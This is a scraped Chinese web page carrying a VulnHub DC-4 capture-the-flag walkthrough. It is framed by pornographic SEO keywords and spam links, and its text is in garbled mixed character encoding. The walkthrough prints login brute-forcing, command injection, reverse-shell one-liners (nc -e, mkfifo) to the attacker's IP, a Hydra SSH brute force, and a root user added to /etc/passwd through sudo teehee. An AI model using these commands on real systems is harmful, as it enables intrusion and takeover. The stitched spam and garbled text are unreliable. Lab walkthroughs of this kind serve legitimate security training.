中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

主機(jī)開設(shè)成功 網(wǎng)站正在建設(shè)中互聯(lián)網(wǎng)推廣怎么做

主機(jī)開設(shè)成功 網(wǎng)站正在建設(shè)中,互聯(lián)網(wǎng)推廣怎么做,做書籍的網(wǎng)站,網(wǎng)頁(yè)廣告投放文章目錄一、環(huán)境搭建二、滲透流程三、思路總結(jié)一、環(huán)境搭建 DC-4下載地址:https://download.vulnhub.com/dc/DC-4.zip kali:192.168.144.148 DC-4:192.168.144.152 二、滲透流程 端口掃描:nmap -T5 -p- -sV -sT -A 192.168.144.1…

文章目錄

  • 一、環(huán)境搭建
  • 二、滲透流程
  • 三、思路總結(jié)


一、環(huán)境搭建

DC-4下載地址:https://download.vulnhub.com/dc/DC-4.zip
kali:192.168.144.148
DC-4:192.168.144.152


二、滲透流程

端口掃描:nmap -T5 -p- -sV -sT -A 192.168.144.152

在這里插入圖片描述

思路:
1、訪問(wèn)80頁(yè)面,爆破賬號(hào)密碼(可利用)
2、對(duì)http://192.168.144.152進(jìn)行目錄爆破
3、查看網(wǎng)頁(yè)源代碼
4、查看web指紋信息
……

使用burpsuite對(duì)登錄頁(yè)面進(jìn)行爆破:admin:happy

在這里插入圖片描述
在這里插入圖片描述

思路:登錄后有run command按鈕,抓包發(fā)現(xiàn)可以執(zhí)行命令
1、請(qǐng)求包中執(zhí)行反彈shell命令(可利用)
2、使用wget,讓靶機(jī)下載webshell,然后連接webshell
……

在這里插入圖片描述

方法1:

使用netcat反彈shell:nc -e /bin/sh 192.168.144.148 4444
kali監(jiān)聽:nc -lvnp 4444

在這里插入圖片描述

python -c 'import pty;pty.spawn("/bin/sh")'

在這里插入圖片描述
方法2:

kali端監(jiān)聽: nc -lnvp 4444
修改網(wǎng)頁(yè)源代碼為反彈shell代碼:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.144.148 4444 > /tmp/f;,然后點(diǎn)擊run

在這里插入圖片描述


kali端獲取到反彈shell

在這里插入圖片描述

思路(此時(shí)已經(jīng)拿到shell):
1、查看當(dāng)前權(quán)限
2、翻翻找找,看看有沒(méi)有可利用的
……

python -c 'import pty;pty.spawn("/bin/bash")'

在這里插入圖片描述

cat /etc/passwd 發(fā)現(xiàn)三個(gè)用戶:charles、jim、sam

在這里插入圖片描述

cd /home 發(fā)現(xiàn)三個(gè)用戶目錄
/jim路徑下發(fā)現(xiàn)old-passwords.bak文件進(jìn)行利用

在這里插入圖片描述

利用old-passwords.bak保存的密碼對(duì)jim的密碼進(jìn)行爆破;
爆破密碼:hydra -l jim -P passwd.txt -s 22 ssh://192.168.144.152
成功獲取密碼:jim:jibril04
ssh登錄:ssh jim@192.168.144.152 -p 22

在這里插入圖片描述

cd /var/mail 下發(fā)現(xiàn)charles的密碼:^xHhA&hvim0y

在這里插入圖片描述

jim下沒(méi)其他可以利用的了,我們嘗試登錄charles用戶
ssh charles@192.168.144.152 -p 22

在這里插入圖片描述

查看是否有sudo權(quán)限:sudo -l
發(fā)現(xiàn)teehee執(zhí)行權(quán)限

在這里插入圖片描述

teehee --help
發(fā)現(xiàn)-a參數(shù)可以寫入文件

在這里插入圖片描述

用戶名:密碼:用戶ID:組ID:用戶說(shuō)明:家目錄:登陸之后的 shell
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su test

在這里插入圖片描述


三、思路總結(jié)

1、爆破登錄賬號(hào)密碼
2、根據(jù)頁(yè)面功能反彈shell
3、查看獲取到的shell的可利用文件
4、ssh連接  
5、利用teehee執(zhí)行權(quán)限添加特權(quán)用戶,獲取root權(quán)限

參考鏈接:
https://blog.mzfr.me/vulnhub-writeups/2019-07-11-DC4

http://www.risenshineclean.com/news/2812.html

相關(guān)文章:

  • 成都最好的軟件公司sem與seo
  • 網(wǎng)站地圖那么建設(shè)不付費(fèi)免費(fèi)網(wǎng)站
  • 網(wǎng)站 數(shù)據(jù)庫(kù)拉新app推廣平臺(tái)排名
  • 做企業(yè)網(wǎng)站注意些啥百度百度地圖
  • 橋西區(qū)網(wǎng)站建設(shè)時(shí)事新聞最新消息
  • 臨滄網(wǎng)站搭建站長(zhǎng)之家點(diǎn)擊進(jìn)入
  • 松江做移動(dòng)網(wǎng)站設(shè)計(jì)網(wǎng)站備案查詢官網(wǎng)
  • 微商城網(wǎng)站制作百度seo咋做
  • 武漢網(wǎng)頁(yè)制作速成班成都做整站優(yōu)化
  • 網(wǎng)站建設(shè)公司軟文產(chǎn)品怎樣推廣有效
  • 網(wǎng)站建設(shè)套模板下載近三天新聞50字左右
  • 中國(guó)建設(shè)集團(tuán)門戶網(wǎng)站百度信息流怎么收費(fèi)
  • 廊坊企業(yè)建站模板流量推廣app
  • 工業(yè)皮帶怎么做免費(fèi)的網(wǎng)站企業(yè)官網(wǎng)怎么做
  • 洛陽(yáng)做網(wǎng)站的看廣告收益的正規(guī)平臺(tái)
  • wordpress金融網(wǎng)站模板廣告推廣費(fèi)用
  • 小程序推廣任務(wù)入口徐州seo企業(yè)
  • 建自己的網(wǎng)站用多少錢關(guān)鍵詞如何快速排名
  • 貴陽(yáng)公司網(wǎng)頁(yè)網(wǎng)站建設(shè)seo工資
  • 網(wǎng)站資質(zhì)優(yōu)化百度空間登錄入口
  • b2b電子商務(wù)網(wǎng)站建設(shè)seo資料站
  • 漳州軟件開發(fā)公司寧波網(wǎng)站建設(shè)網(wǎng)站排名優(yōu)化
  • 畢業(yè)論文網(wǎng)站建設(shè)報(bào)告seo顧問(wèn)賺錢嗎
  • 做爰視頻網(wǎng)站在線看合肥關(guān)鍵詞排名
  • 包頭人臉檢測(cè)系統(tǒng)廣州seo優(yōu)化排名公司
  • 動(dòng)易網(wǎng)站后臺(tái)域名在線查詢
  • wordpress掛下載鏈接正規(guī)seo排名外包
  • 廣東省建設(shè)安全監(jiān)督站的網(wǎng)站識(shí)圖
  • 關(guān)于政府網(wǎng)站集約化建設(shè)的報(bào)告鎮(zhèn)江seo優(yōu)化
  • 界面做的比較好的網(wǎng)站推廣普通話宣傳語(yǔ)手抄報(bào)